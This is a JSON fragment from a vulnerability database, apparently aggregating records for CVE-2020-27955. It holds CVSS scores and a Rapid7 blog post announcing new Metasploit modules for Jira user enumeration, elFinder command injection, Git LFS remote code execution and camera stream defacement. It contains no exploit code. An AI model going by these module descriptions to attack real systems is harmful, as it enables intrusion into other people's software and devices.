"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-10T23:04:18", "type": "alpinelinux", "title": "CVE-2020-27955", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2023-06-10T23:04:18", "id": "ALPINE:CVE-2020-27955", "href": "https://security.alpinelinux.org/vuln/CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-09-17T21:01:48", "description": "\n\n## Clone your way to code execution\n\n\n\nWe\u2019ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and El Finder lead the pack this week with an information disclosure against Jira and a post exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!\n\n## Git push upstream git-lfs:payload\n\nOur own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting Github, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected Github repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.\n\n## Jira users\n\nBrian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) to get a list of Jira users, helping those social engineers among us to get more targets or login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.\n\n## New module content (4)\n\n * [Jira Users Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14631>) by Brian Halbach and Mikhail Klyuchnikov, which exploits [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) \\- This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint.\n * [elFinder Archive Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15658>) by Shelby Pace and Thomas Chauchefoin, which exploits [CVE-2021-32682](<https://attackerkb.com/topics/llBeWZGXq9/cve-2021-32682?referrer=blog>) \\- This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.\n * [Git Remote Code Execution via git-lfs (CVE-2020-27955)](<https://github.com/rapid7/metasploit-framework/pull/15624>) by Dawid Golunski, [jheysel-r7](<https://github.com/jheysel-r7>), and [space-r7](<https://github.com/space-r7>), which exploits [CVE-2020-27955](<https://attackerkb.com/topics/33ELRpbDyL/cve-2020-27955-git-large-file-storage-git-lfs-git-lfs---remote-code-execution-rce?referrer=blog>) \\- This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.\n * [Geutebruck Camera Deface](<https://github.com/rapid7/metasploit-framework/pull/15601>) by Ibrahim Ayadhi and S\u00e9bastien Charbonnier - A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.\n\n## Enhancements and features\n\n * [#15609](<https://github.com/rapid7/metasploit-framework/pull/15609>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.\n * [#15674](<https://github.com/rapid7/metasploit-framework/pull/15674>) from [digininja](<https://github.com/digininja>) \\- Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying if the module has succeeded\n\n## Bugs fixed\n\n * [#15667](<https://github.com/rapid7/metasploit-framework/pull/15667>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix powershell_reverse_tcp file operations and update the file operations test module\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-08T18%3A07%3A57-05%3A00..2021-09-15T14%3A13%3A18-05%3A00%22>)\n * [Full diff 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/compare/6.1.5...6.1.6>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Toni Barros from S\u00e3o Paulo, Brasil - Hello, Dolly!, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-17T19:59:18", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181", "CVE-2020-27955", "CVE-2021-32682"], "modified": "2021-09-17T19:59:18", "id": "RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84", "href": "https://blog.rapid7.com/2021/09/17/metasploit-wrap-up-130/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)
